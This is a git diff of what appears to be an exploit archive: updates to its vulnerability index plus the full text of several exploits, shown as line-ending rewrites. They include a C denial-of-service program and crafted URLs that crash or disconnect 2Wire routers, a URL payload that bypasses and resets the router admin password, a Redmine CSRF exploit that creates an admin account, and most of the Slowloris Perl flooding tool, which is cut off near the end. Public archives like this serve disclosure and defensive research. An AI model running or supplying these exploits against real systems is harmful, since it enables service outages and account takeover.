33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework Default Location Insecure Temporary File Creation Vulnerability",2009-08-03,"Melissa Elliott",linux,local,0 33146,platforms/php/webapps/33146.txt,"CS-Cart 2.0.5 'reward_points.post.php' SQL Injection Vulnerability",2009-08-04,"Ryan Dewhurst",php,webapps,0 -33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 'txtkeyword' Parameter Cross Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0 +33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Parameter Cross Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0 33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x 'posix-timers.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-06,"Hiroshi Shimamoto",linux,dos,0 33149,platforms/php/webapps/33149.txt,"Alkacon OpenCms 7.x Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0 33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 'cat' Parameter Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-07,"599eme Man",php,webapps,0 @@ -29878,7 +29872,7 @@ id,file,description,date,author,platform,type,port 33162,platforms/php/remote/33162.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (1)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0 33163,platforms/php/remote/33163.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (2)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0 33164,platforms/multiple/remote/33164.txt,"WebKit Floating Point Number Remote Buffer Overflow Vulnerability",2009-08-11,Apple,multiple,remote,0 -33165,platforms/hardware/remote/33165.txt,"2Wire Routers 'CD35_SETUP_01' Access Validation Vulnerability",2009-08-12,hkm,hardware,remote,0 +33165,platforms/hardware/remote/33165.txt,"2Wire Routers 'CD35_SETUP_01' - Access Validation Vulnerability",2009-08-12,hkm,hardware,remote,0 33166,platforms/php/webapps/33166.txt,"Discuz! 6.0 '2fly_gift.php' SQL Injection Vulnerability",2009-08-15,Securitylab.ir,php,webapps,0 33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_authenticatewizarduser.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/logviewer/searchlog.cfm startRow Parameter XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 @@ -30087,8 +30081,29 @@ id,file,description,date,author,platform,type,port 33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component 'yt_color' Parameter Cross Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0 33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0 33394,platforms/php/webapps/33394.txt,"Invision Power Board <= 3.0.3 '.txt' File MIME-Type Cross Site Scripting Vulnerability",2009-12-09,Xacker,php,webapps,0 +33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Local Privilege Escalation Vulnerability",2009-11-09,"Akira Fujita",linux,local,0 33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite 'basic_search_result.php' Cross Site Scripting Vulnerability",2009-12-10,bi0,php,webapps,0 33397,platforms/linux/dos/33397.txt,"MySQL <= 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0 33398,platforms/linux/dos/33398.txt,"MySQL <= 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0 33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0 33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0 +33401,platforms/php/webapps/33401.txt,"Million Pixel Script 3 'pa' Parameter Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0 +33402,platforms/linux/remote/33402.txt,"Ruby on Rails <= 2.3.5 'protect_from_forgery' Cross Site Request Forgery Vulnerability",2009-12-14,p0deje,linux,remote,0 +33403,platforms/windows/dos/33403.py,"Intellicom 1.3 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow Vulnerability",2009-12-14,"Ruben Santamarta ",windows,dos,0 +33404,platforms/php/webapps/33404.txt,"phpFaber CMS 1.3.36 'module.php' Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0 +33405,platforms/multiple/remote/33405.txt,"APC Network Management Card Cross Site Request Forgery and Cross Site Scripting Vulnerabilities",2009-12-15,"Jamal Pecou",multiple,remote,0 +33406,platforms/php/webapps/33406.txt,"Horde <= 3.3.5 Administration Interface admin/phpshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33407,platforms/php/webapps/33407.txt,"Horde <= 3.3.5 Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33408,platforms/php/webapps/33408.txt,"Horde <= 3.3.5 Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33409,platforms/php/webapps/33409.txt,"Article Directory 'login.php' SQL Injection Vulnerabilities",2009-12-16,"R3d D3v!L",php,webapps,0 +33410,platforms/php/webapps/33410.txt,"Drupal Sections 5.x-1.2/6.x-1.2 Module HTML Injection Vulnerability",2009-12-16,"Justin C. Klein Keane",php,webapps,0 +33411,platforms/php/webapps/33411.txt,"iSupport 1.8 ticket_function.php Multiple Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0 +33412,platforms/php/webapps/33412.txt,"iSupport 1.8 index.php which Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0 +33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 'core/admin/auth.php' Cross Site Scripting Vulnerability",2009-12-17,Metropolis,php,webapps,0 +33414,platforms/php/remote/33414.php,"PHP <= 5.2.11 'htmlspecialcharacters()' Malformed Multibyte Character Cross Site Scripting Vulnerability (1)",2009-12-17,hello@iwamot.com,php,remote,0 +33415,platforms/php/remote/33415.php,"PHP <= 5.2.11 'htmlspecialcharacters()' Malformed Multibyte Character Cross Site Scripting Vulnerability (2)",2009-12-17,hello@iwamot.com,php,remote,0 +33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x 'lang' Parameter Local File Include Vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 +33417,platforms/php/webapps/33417.txt,"cPanel 11.x 'fileop' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 +33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component 'secid' Parameter SQL Injection Vulnerability",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 +33419,platforms/php/webapps/33419.txt,"F3Site 2009 mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 +33420,platforms/php/webapps/33420.txt,"F3Site 2009 mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 diff --git a/platforms/hardware/dos/2246.cpp b/platforms/hardware/dos/2246.cpp index ea2ffaa31..169d79b19 100755 --- a/platforms/hardware/dos/2246.cpp +++ b/platforms/hardware/dos/2246.cpp @@ -1,95 +1,95 @@ -//Vulnerable: -//2Wire OfficePortal 0 -//2Wire HomePortal 1500W -//2Wire HomePortal 100W -//2Wire HomePortal 100S -//2Wire HomePortal 1000W -//2Wire HomePortal 1000SW -//2Wire HomePortal 1000S -//2Wire HomePortal 1000 -//2Wire HomePortal 0 -////////////////////////////////// [ STARTING CODE ] -//////////////////////////////////////////////////// -//// -//// [ Explanation ] this PoC make an evil_request -//// and send to the server , when the server process -//// it the request fall him, AND THE MODEM WILL RESET!. -//// -//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2 -//// If you have any error with the librarys you need -//// include libws2_32.a at the project. -//// -//// Enjoy it n_nU!.. -//// Coded by preth00nker (using Mexican skill!) - -#pragma comment(lib,"libws2_32.a") -#include -#include -#include -#include "winsock2.h" - -unsigned long dir; -char h[]=""; -short port; -char badreq[]=""; -int state; - -int main(int argc, char *argv[]) -{ - printf("\n################################################\n"); - printf("####\n"); - printf("#### PoC of DoS 2wire_Gateway\n"); - printf("#### By Preth00nker\n"); - printf("#### http://www.mexhackteam.org\n"); - printf("####\n"); - printf("####\n\n"); - if (argc<4){ - printf("[Usage] %s $Host $Port $Variable\n",argv[0]); - printf("\n[I.E.] %s 192.168.1.254 80 PAGE\n",argv[0]); - return 0; - } - //Crear socket - WSADATA wsaData; - WSAStartup(MAKEWORD(2,2),&wsaData); - SOCKET wsck; - //Estructuras - struct sockaddr_in Wins; - struct hostent *target; - //Wins - Wins.sin_family=AF_INET; - Wins.sin_port=htons((short)atoi(argv[2])); - target=gethostbyname(argv[1]); - Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr)); - //llamamos al socket - wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL); - //Verifica por error - if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;} - printf("Socket creado correctamente!.. hWndl: %d",wsck); - //Conecta - if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){ - WSACleanup(); - return 0; - printf("\nError al conectar =!.."); - } - printf("\nConectado!.."); - //Make a bad query and send it ..Mwajuajua!.. - strcat(badreq,"GET /xslt?"); - strcat(badreq,argv[3]); - strcat(badreq,"=%0D%0A HTTP/1.0\r\n"); - strcat(badreq,"Accept-Language: es-mx\r\n"); - strcat(badreq,"User-Agent: MexHackTeam\r\n"); - strcat(badreq,"Host: "); - strcat(badreq,argv[1]); - strcat(badreq, "\r\n\r\n\r\n"); - send(wsck , badreq ,(int)strlen(badreq), 0); - printf("\nDatos Mandados!.."); - //finalized - Sleep(100); - printf("\nThat's all, Check this out!...\n"); - WSACleanup(); - return 0; -} -//////////////////////////////////////////// [ EOF ] -//////////////////////////////////////////////////// - -// milw0rm.com [2006-08-22] +//Vulnerable: +//2Wire OfficePortal 0 +//2Wire HomePortal 1500W +//2Wire HomePortal 100W +//2Wire HomePortal 100S +//2Wire HomePortal 1000W +//2Wire HomePortal 1000SW +//2Wire HomePortal 1000S +//2Wire HomePortal 1000 +//2Wire HomePortal 0 +////////////////////////////////// [ STARTING CODE ] +//////////////////////////////////////////////////// +//// +//// [ Explanation ] this PoC make an evil_request +//// and send to the server , when the server process +//// it the request fall him, AND THE MODEM WILL RESET!. +//// +//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2 +//// If you have any error with the librarys you need +//// include libws2_32.a at the project. +//// +//// Enjoy it n_nU!.. +//// Coded by preth00nker (using Mexican skill!) + +#pragma comment(lib,"libws2_32.a") +#include +#include +#include +#include "winsock2.h" + +unsigned long dir; +char h[]=""; +short port; +char badreq[]=""; +int state; + +int main(int argc, char *argv[]) +{ + printf("\n################################################\n"); + printf("####\n"); + printf("#### PoC of DoS 2wire_Gateway\n"); + printf("#### By Preth00nker\n"); + printf("#### http://www.mexhackteam.org\n"); + printf("####\n"); + printf("####\n\n"); + if (argc<4){ + printf("[Usage] %s $Host $Port $Variable\n",argv[0]); + printf("\n[I.E.] %s 192.168.1.254 80 PAGE\n",argv[0]); + return 0; + } + //Crear socket + WSADATA wsaData; + WSAStartup(MAKEWORD(2,2),&wsaData); + SOCKET wsck; + //Estructuras + struct sockaddr_in Wins; + struct hostent *target; + //Wins + Wins.sin_family=AF_INET; + Wins.sin_port=htons((short)atoi(argv[2])); + target=gethostbyname(argv[1]); + Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr)); + //llamamos al socket + wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL); + //Verifica por error + if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;} + printf("Socket creado correctamente!.. hWndl: %d",wsck); + //Conecta + if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){ + WSACleanup(); + return 0; + printf("\nError al conectar =!.."); + } + printf("\nConectado!.."); + //Make a bad query and send it ..Mwajuajua!.. + strcat(badreq,"GET /xslt?"); + strcat(badreq,argv[3]); + strcat(badreq,"=%0D%0A HTTP/1.0\r\n"); + strcat(badreq,"Accept-Language: es-mx\r\n"); + strcat(badreq,"User-Agent: MexHackTeam\r\n"); + strcat(badreq,"Host: "); + strcat(badreq,argv[1]); + strcat(badreq, "\r\n\r\n\r\n"); + send(wsck , badreq ,(int)strlen(badreq), 0); + printf("\nDatos Mandados!.."); + //finalized + Sleep(100); + printf("\nThat's all, Check this out!...\n"); + WSACleanup(); + return 0; +} +//////////////////////////////////////////// [ EOF ] +//////////////////////////////////////////////////// + +// milw0rm.com [2006-08-22] diff --git a/platforms/hardware/dos/7060.txt b/platforms/hardware/dos/7060.txt index c48e1d4cf..2f21d8f43 100755 --- a/platforms/hardware/dos/7060.txt +++ b/platforms/hardware/dos/7060.txt @@ -1,34 +1,34 @@ -2WIRE ROUTER DSL DENIAL OF SERVICE - - -VULNERABLE -Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway -Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51 - -The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character. - -PoC: (this can be set in an IMG tag or whatever) - -http://gateway.2wire.net/xslt?page=%& -http://gateway.2wire.net/xslt?page=%@ -http://gateway.2wire.net/xslt?page=%! -http://gateway.2wire.net/xslt?page=%+ -http://gateway.2wire.net/xslt?page=%; -http://gateway.2wire.net/xslt?page=%' -http://gateway.2wire.net/xslt?page=%~ -http://gateway.2wire.net/xslt?page=%* -http://gateway.2wire.net/xslt?page=%0 -http://gateway.2wire.net/xslt?page=%9 -http://gateway.2wire.net/xslt?page=%? -http://home... -etc... - - -hkm - - -hkm {@} hakim.ws - -Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex. - -# milw0rm.com [2008-11-08] +2WIRE ROUTER DSL DENIAL OF SERVICE + + +VULNERABLE +Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway +Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51 + +The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character. + +PoC: (this can be set in an IMG tag or whatever) + +http://gateway.2wire.net/xslt?page=%& +http://gateway.2wire.net/xslt?page=%@ +http://gateway.2wire.net/xslt?page=%! +http://gateway.2wire.net/xslt?page=%+ +http://gateway.2wire.net/xslt?page=%; +http://gateway.2wire.net/xslt?page=%' +http://gateway.2wire.net/xslt?page=%~ +http://gateway.2wire.net/xslt?page=%* +http://gateway.2wire.net/xslt?page=%0 +http://gateway.2wire.net/xslt?page=%9 +http://gateway.2wire.net/xslt?page=%? +http://home... +etc... + + +hkm + + +hkm {@} hakim.ws + +Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex. + +# milw0rm.com [2008-11-08] diff --git a/platforms/hardware/remote/9422.txt b/platforms/hardware/remote/9422.txt index 873a802f9..000e43e25 100755 --- a/platforms/hardware/remote/9422.txt +++ b/platforms/hardware/remote/9422.txt @@ -1,81 +1,81 @@ -2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET (08/04/09) -============================================================== - - - DESCRIPTION ------------------ -There is an authentication bypass vulnerability in page=CD35_SETUP_01 that -allows you to set a new password even if the password was previously set. - -By setting a new password with more than 512 characters the password gets -reset and next time you access the router you will be prompted for a new -password. - - - VULNERABLE ----------------- -2Wire 2071 Gateway -2Wire 1800HW -2Wire 1701HG - - Firmware -5.29.51 -3.17.5 -3.7.1 - - NOT VULNERABLE --------------------- - Firmware -5.29.135.5 or later - - - DISCLOSURE TIMELINE -------------------------- -03/27/2009 - 2wire Contacted no satisfactory response -07/11/2009 - Sent complete details to 2wire no response -07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response -08/02/2009 - Made public @ Defcon 17 - - - EXPLOIT/POC ------------------ -Authentication Bypass - just use this page to set a new password - - http://gateway.2wire.net?xslt?page=CD35_SETUP_01 - -Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv - - -Password Reset - using the same form but sending a password > 512 characters - -http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm -hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh -kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk -mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm -hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh -kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk -mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh -kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm -hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh -kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk -mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm -hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh -kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk -mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm - -Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv - - - GREETS ------------- -sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3 -hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa -Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield - - Comunidad Underground de Mexico : https://www.underground.org.mx - - - h k m - http://www.hakim.ws - -# milw0rm.com [2009-08-12] +2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET (08/04/09) +============================================================== + + + DESCRIPTION +----------------- +There is an authentication bypass vulnerability in page=CD35_SETUP_01 that +allows you to set a new password even if the password was previously set. + +By setting a new password with more than 512 characters the password gets +reset and next time you access the router you will be prompted for a new +password. + + + VULNERABLE +---------------- +2Wire 2071 Gateway +2Wire 1800HW +2Wire 1701HG + + Firmware +5.29.51 +3.17.5 +3.7.1 + + NOT VULNERABLE +-------------------- + Firmware +5.29.135.5 or later + + + DISCLOSURE TIMELINE +------------------------- +03/27/2009 - 2wire Contacted no satisfactory response +07/11/2009 - Sent complete details to 2wire no response +07/17/2009 - Sent advisory with video demo to 2wire ticket status escalated, but no response +08/02/2009 - Made public @ Defcon 17 + + + EXPLOIT/POC +----------------- +Authentication Bypass - just use this page to set a new password + + http://gateway.2wire.net?xslt?page=CD35_SETUP_01 + +Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv + + +Password Reset - using the same form but sending a password > 512 characters + +http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkm +hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh +kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk +mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm +hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh +kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk +mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkh +kmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm +hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh +kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk +mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkm +hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmh +kmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhk +mhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm + +Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv + + + GREETS +------------ +sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3 +hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana roa +Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield + + Comunidad Underground de Mexico : https://www.underground.org.mx + + + h k m + http://www.hakim.ws + +# milw0rm.com [2009-08-12] diff --git a/platforms/linux/local/141.c b/platforms/linux/local/141.c index bf61ebd1c..6e598ab94 100755 --- a/platforms/linux/local/141.c +++ b/platforms/linux/local/141.c @@ -45,6 +45,6 @@ int main( void ) fork(); return( 0 ); -} - -// milw0rm.com [2004-01-06] +} + +// milw0rm.com [2004-01-06] diff --git a/platforms/linux/local/142.c b/platforms/linux/local/142.c index 360d4145e..b63ca68a6 100755 --- a/platforms/linux/local/142.c +++ b/platforms/linux/local/142.c @@ -135,6 +135,6 @@ int main(int argc, char **argv) close(fd); return 0; -} - -// milw0rm.com [2004-01-07] +} + +// milw0rm.com [2004-01-07] diff --git a/platforms/linux/local/145.c b/platforms/linux/local/145.c index f37712462..3727b46bf 100755 --- a/platforms/linux/local/145.c +++ b/platforms/linux/local/145.c @@ -407,6 +407,6 @@ int main(void) return 0; } - - -// milw0rm.com [2004-01-15] + + +// milw0rm.com [2004-01-15] diff --git a/platforms/linux/local/154.c b/platforms/linux/local/154.c index 6edbb8376..58b5de2ae 100755 --- a/platforms/linux/local/154.c +++ b/platforms/linux/local/154.c @@ -95,6 +95,6 @@ int main( void ) return( 0 ); } - - -// milw0rm.com [2004-02-18] + + +// milw0rm.com [2004-02-18] diff --git a/platforms/linux/local/160.c b/platforms/linux/local/160.c index 4ec3637d6..fa60ee86d 100755 --- a/platforms/linux/local/160.c +++ b/platforms/linux/local/160.c @@ -295,6 +295,6 @@ int main(int ac, char **av) } return 0; -} - -// milw0rm.com [2004-03-01] +} + +// milw0rm.com [2004-03-01] diff --git a/platforms/linux/local/33395.txt b/platforms/linux/local/33395.txt new file mode 100755 index 000000000..c28b7cc92 --- /dev/null +++ b/platforms/linux/local/33395.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37277/info + +Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions. + +Exploits may allow attackers to execute arbitrary code with kernel-level privileges and launch other attacks. + +Successful exploits will result in the complete compromise of affected computers. + +http://www.exploit-db.com/sploits/33395.tgz \ No newline at end of file diff --git a/platforms/linux/remote/33402.txt b/platforms/linux/remote/33402.txt new file mode 100755 index 000000000..c15cac88a --- /dev/null +++ b/platforms/linux/remote/33402.txt @@ -0,0 +1,37 @@ +source: http://www.securityfocus.com/bid/37322/info + +Ruby on Rails is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible. + +/** +* Redmine <= 0.8.6 CSRF Add Admin User Exploit +* Discovered by: p0deje (http://p0deje.blogspot.com) +* Application: http://www.redmine.org/wiki/redmine/Download +* SA: http://www.redmine.org/news/30 +* Date: 13.11.2009 +* Versions affected: <= 0.8.6 +* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights +*/ + + + +
+ + + + + + + + + +
+ + + + +/** +* P.S. Actually, this vulnerability wasn't fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users. +* Thus, you can add POST data with token of any user and exploit will be working again +*/ diff --git a/platforms/multiple/dos/8976.pl b/platforms/multiple/dos/8976.pl index 1795e1f1b..01317d740 100755 --- a/platforms/multiple/dos/8976.pl +++ b/platforms/multiple/dos/8976.pl @@ -1,466 +1,466 @@ -#!/usr/bin/perl -w -use strict; -use IO::Socket::INET; -use IO::Socket::SSL; -use Getopt::Long; -use Config; - -$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors - -print < \$shost, - 'dns=s' => \$host, - 'httpready' => \$httpready, - 'num=i' => \$connections, - 'cache' => \$cache, - 'port=i' => \$port, - 'https' => \$ssl, - 'tcpto=i' => \$tcpto, - 'test' => \$test, - 'timeout=i' => \$timeout, - 'version' => \$version, -); - -if ($version) { - print "Version 0.7\n"; - exit; -} - -unless ($host) { - print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; - print "\n\tType 'perldoc $0' for help with options.\n\n"; - exit; -} - -unless ($port) { - $port = 80; - print "Defaulting to port 80.\n"; -} - -unless ($tcpto) { - $tcpto = 5; - print "Defaulting to a 5 second tcp connection timeout.\n"; -} - -unless ($test) { - unless ($timeout) { - $timeout = 100; - print "Defaulting to a 100 second re-try timeout.\n"; - } - unless ($connections) { - $connections = 1000; - print "Defaulting to 1000 connections.\n"; - } -} - -my $usemultithreading = 0; -if ( $Config{usethreads} ) { - print "Multithreading enabled.\n"; - $usemultithreading = 1; - use threads; - use threads::shared; -} -else { - print "No multithreading capabilites found!\n"; - print "Slowloris will be slower than normal as a result.\n"; -} - -my $packetcount : shared = 0; -my $failed : shared = 0; -my $connectioncount : shared = 0; - -srand() if ($cache); - -if ($shost) { - $sendhost = $shost; -} -else { - $sendhost = $host; -} -if ($httpready) { - $method = "POST"; -} -else { - $method = "GET"; -} - -if ($test) { - my @times = ( "2", "30", "90", "240", "500" ); - my $totaltime = 0; - foreach (@times) { - $totaltime = $totaltime + $_; - } - $totaltime = $totaltime / 60; - print "This test could take up to $totaltime minutes.\n"; - - my $delay = 0; - my $working = 0; - my $sock; - - if ($ssl) { - if ( - $sock = new IO::Socket::SSL( - PeerAddr => "$host", - PeerPort => "$port", - Timeout => "$tcpto", - Proto => "tcp", - ) - ) - { - $working = 1; - } - } - else { - if ( - $sock = new IO::Socket::INET( - PeerAddr => "$host", - PeerPort => "$port", - Timeout => "$tcpto", - Proto => "tcp", - ) - ) - { - $working = 1; - } - } - if ($working) { - if ($cache) { - $rand = "?" . int( rand(99999999999999) ); - } - else { - $rand = ""; - } - my $primarypayload = - "GET /$rand HTTP/1.1\r\n" - . "Host: $sendhost\r\n" - . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" - . "Content-Length: 42\r\n"; - if ( print $sock $primarypayload ) { - print "Connection successful, now comes the waiting game...\n"; - } - else { - print -"That's odd - I connected but couldn't send the data to $host:$port.\n"; - print "Is something wrong?\nDying.\n"; - exit; - } - } - else { - print "Uhm... I can't connect to $host:$port.\n"; - print "Is something wrong?\nDying.\n"; - exit; - } - for ( my $i = 0 ; $i <= $#times ; $i++ ) { - print "Trying a $times[$i] second delay: \n"; - sleep( $times[$i] ); - if ( print $sock "X-a: b\r\n" ) { - print "\tWorked.\n"; - $delay = $times[$i]; - } - else { - if ( $SIG{__WARN__} ) { - $delay = $times[ $i - 1 ]; - last; - } - print "\tFailed after $times[$i] seconds.\n"; - } - } - - if ( print $sock "Connection: Close\r\n\r\n" ) { - print "Okay 